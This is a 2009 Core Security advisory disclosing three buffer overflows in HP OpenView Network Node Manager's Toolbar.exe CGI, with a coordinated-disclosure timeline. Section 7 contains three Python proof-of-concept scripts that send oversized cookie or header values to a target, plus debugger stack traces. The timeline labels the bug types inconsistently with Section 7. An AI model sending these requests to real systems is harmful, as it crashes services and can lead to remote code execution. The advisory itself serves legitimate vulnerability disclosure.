1.
Advisory Information
Title:
HP OpenView Buffer Overflows
Advisory ID: CORE-2009-0122
Advisory URL: http://www.coresecurity.com/content/openview-buffer-overflows
Date published: 2009-03-23
Date of last update: 2009-03-19
Vendors contacted: Hewlett-Packard
Release mode: Coordinated release
2.
Vulnerability Information
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34134, 34135
CVE Name: CVE-2009-0920, CVE-2009-0921
3.
Vulnerability Description
Several buffer overflows have been found in HP OpenView Network Node Manager,
which can be exploited to remotely compromise a user's system.
4.
Vulnerable packages
- HP OpenView Network Node Manager 7.51
- HP OpenView Network Node Manager 7.53
- HP OpenView Network Node Manager 7.53 with patch NNM_01195
- Other versions may be affected
5.
Vendor Information, Solutions and Workarounds
The vendor will publish a security bulletin including solution information [5].
6.
Credits
These vulnerabilities were discovered and researched by Oren Isacson
from Core Security Technologies.
7.
Technical Description / Proof of Concept Code
Several buffer overflows have been found in HP OpenView Network Node Manager,
which can be exploited to remotely compromise a user's system.
While working on an exploit for the vulnerabilities disclosed in the advisory
[3],
three bugs were found. The stack-based bug found on CGI parameter OvOSLocale
is similar to one of the bugs previously reported in
[3]
whereas the two heap-based bugs are different vulnerabilities.
Versions 7.51, 7.53, and 7.53 with patch NNM_01195 were tested and all of them were vulnerable.
The two heap-based buffer overflows are different vulnerabilities
from those exposed publicly on CVE-2008-0067 because the vulnerabilities are not fixed with patch NNM_01195
and are not mentioned on published advisories.
CVE identification code CVE-2009-0920 was assigned to the unpatched/variant stack-based overflow related to
CVE-2008-0067, and CVE-2009-0921 was assigned for the two heap overflows. Bugtraq IDs (BIDs) were assigned:
34134 for OvAcceptLang
parameter bug; and 34135 for the Accept-Language HTTP header bug.
7.1.
Stack-based overflow (CVE-2009-0920)
It is important to remark that the stack-based bug on parameter OvOSLocale,
that we assumed to be mentioned on published advisories,
is not fixed by the previous patch NNM_01195. Proof of concept follows.
import socket,sys
if len(sys.argv)!=3:
print "USAGE:OvOSLocale.py server port"
else:
req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie: OvOSLocale=en_US"+'a'*1400+"; OvAcceptLang=en-usa\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('127.0.0.1',80))
s.connect((sys.argv[1],int(sys.argv[2])))
s.send(req)
print s.recv(4000)
A debugger was used on a Windows system to see where the OvOSLocale overflow is located.
The call stack shows that _OVresetLangEnv in ovutil.dll callsov.sprintf_new in ov.dll that calls _vsnprintf
in msvcrt.dll.
The destination buffer of the _vsnprintf is located on the stack, the count
is 0x7fff, the format is OV_LANG=%s, and the string is too large for
the stack buffer, causing the stack overflow. A new CVE name was assigned, CVE-2009-0920, marking
this bug as unfixed or variant.
7.2.
Heap-based overflow (CVE-2009-0921, BID 34134)
Sending HTTP requests to the Toolbar.exe application with largeOvAcceptLang cookies causes a buffer overflow.
For example the following Python program causes an access violation onToolbar.exe if executed on a windows machine running NNM Admin.
The return code of the web server is502, signaling an error on the CGI application.
Using similar requests, remote code execution is possible.Toolbar.exe is just an exploitation path; in the case of parameter OvAcceptLang
the bug is actually located on ov.dll (i.e. on Windows).
import socket,sys
if len(sys.argv)!=3:
print "USAGE:OvAcceptLang.py server port"
else:
req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie: OvOSLocale=en_US; OvAcceptLang=en-usa"+'a'*1400+"\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.send(req)
print s.recv(4000)
A debugger was also used to see where the OvAcceptLang overflow is
located. The program being debugged is Toolbar.exe. This is the call
stack of the _vsnprintf function that we think causes the overflow. It
can be seen that the real culprit is located in ovwww.dll. A call is
made to sprintf_new with a destination buffer located in the heap that
is too small to hold the written string.
0012724C 00392F98 ASCII "OvAcceptLang" 00127250 006C4BD0 ASCII "en-usaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"... Call stack of main thread Address Stack Procedure / arguments Called from Frame 00117214 5A028A26 msvcrt._vsnprintf ov.5A028A20 0012723C 00117218 00117234 buffer = 00117234 0011721C 00007FFF count = 7FFF (32767.) 00117220 5A316680 format = "%s=%s" 00117224 0012724C arglist = 0012724C 00127240 5A308715 ov.sprintf_new ovwww.5A30870F 0012723C 00127268 5A308618 ovwww.5A3086D0 ovwww.5A308613 00127264 00127288 5A3081CB ovwww.5A3085D0 ovwww.5A3081C6 00127284 001272A0 5A30C930 ovwww.setCookie ovwww.5A30C92B 0012729C 00127308 5A307F26 ovwww.5A30C675 ovwww.5A307F21 00127304 0012792C 00401029 ovwww.?OvWwwInit@@YAXAAHQAPADPBD@Z Toolbar.00401023 00127928 0012FF50 004013A2 Toolbar.00401000 Toolbar.0040139D 0012FF4C
7.3.
Heap-based overflow (CVE-2009-0921, BID 34135)
When sending a large Accept-Language HTTP header another heap buffer is overflowed.
This vulnerability could also be used to obtain remote code execution. On Solaris, the bug is located insidelibovwww.so.4 and on Windows inside ovwww.dll.
import socket,sys
if len(sys.argv)!=3:
print "USAGE:AcceptLanguage.py server port"
else:
req="POST /OvCgi/Toolbar.exe HTTP/1.0\nAccept-Language: "+'a'*1400+"\nContent-Length:0\nHost:192.168.22.252\n\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.send(req)
print s.recv(4000)
8.
Report Timeline
- 2009-01-07:
Secunia publishes an advisory about HP OpenView Network Node Manager with various CGI stack-based
overflows. The identifier CVE-2008-0067 is assigned
[3]. - 2009-01-09:
Saint releases to their customers an exploit attacking OpenView through a CGI parameter
[2]. - 2009-01-20:
The vendor releases a patch to fix the issues included on CVE-2008-0067
[4]. - 2009-01-21:
Oren Isacson at Core Security Technologies writes an exploit for a stack-based overflow (CGI parameterOvAcceptLang)
and finds two new bugs, one heap overflow on CGI parameterOvOSLocale
and a heap overflow on HTTP headerAccept-Language. - 2009-01-22:
Core notifies the vendor that vulnerabilities were found and that an advisory draft is available. - 2009-01-22:
Vendor acknowledges and requests for an encrypted copy of the advisory's draft. - 2009-01-23:
Core sends the advisory's draft to the vendor, including proof of concept code for the OvAcceptLang's bug. - 2009-01-28:
Vendor says the vulnerability can't exist when patch is installed and asks for confirmation of
faulty installation and oldov.dllinstalled. - 2009-01-29:
Core confirms the vendor that no duplicatedov.dllwas found and that
the real culprit for the OvAcceptLang bug is located onovwww.dll.
Detailed debugging information is sent. - 2009-01-29:
Vendor acknowledges the new information. - 2009-02-05:
Core requests an update from the vendor and confirmation of the tentative schedule of February 16th
to publish this information. - 2009-02-06:
Vendor sends an update and requests proof of concept code for the other two bugs. - 2009-02-09:
Core sends proof of concept code for the three bugs and
requests confirmation or changes on the tentative schedule on February 16th when possible. - 2009-02-09:
Vendor acknowledges the reception of the proof of concept code. - 2009-02-16:
Core informs the vendor that the publication of the advisory has been rescheduled to March 8.
Core insists that the advisory should be published as soon as possible. - 2009-02-19:
Vendor informs Core that that hot fix will be available on March 15 and requests delaying the advisory until March 17. - 2009-02-19:
Core confirms the vendor that the publication of the advisory will be delayed until March 17. - 2009-02-19:
Vendor acknowledges the new schedule. - 2009-03-16:
Vendor sends to Core the hot fix (for Windows) for verification. - 2009-03-16:
Core confirms the vendor that the hot fix is avoiding the three bugs. - 2009-03-17:
Vendor says that it will take time to draft the security bulletin and coordinate it within HP,
and that they will publish their security bulletin on March 24.
Vendor asks Core not to publish the patch location because that should be published on their security bulletin. - 2009-03-17:
Core re-schedules advisory CORE-2009-0122 publication to March 24
and asks the vendor the URL of their security bulletin when available. - 2009-03-17:
Core asks the vendor to reschedule publication to March 23, because March 24 is a working holiday in
Argentina, where Core's research and development center is located. - 2009-03-17:
Vendor confirms March 23 as the new publication date. - 2009-03-23:
Vendor publishes the hot fix. - 2009-03-23:
Core publishes advisory CORE-2009-0122.
9.
References
[1]
Secunia Research 07/01/2009
http://secunia.com/secunia_research/2008-13/
[2]
HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow
http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar
[3]
CVE-2008-0067
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
[4]
HP advisory (HPSBMA02400 SSRT080144)
https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081
[5]
HP security bulletin
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729
10.
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://www.coresecurity.com/corelabs.
11.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious
organizations worldwide develop and maintain a proactive process for
securing their networks. The company's flagship product, CORE IMPACT, is
the most comprehensive product for performing enterprise security
assurance testing. CORE IMPACT evaluates network, endpoint and end-user
vulnerabilities and identifies what resources are exposed. It enables
organizations to determine if current security investments are detecting
and preventing attacks. Core Security Technologies augments its leading technology solution
with world-class security consulting services, including penetration
testing and software security auditing. Based in Boston, MA and Buenos
Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web
at http://www.coresecurity.com.
12.
Disclaimer
The contents of this advisory are copyright (c) 2009 Core Security Technologies and
(c) 2009 CoreLabs, and may be distributed freely provided
that no fee is charged for this distribution and proper credit is given.
13.
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories
team, which is available for download at
/legacy/files/attachments/core_security_advisories.asc.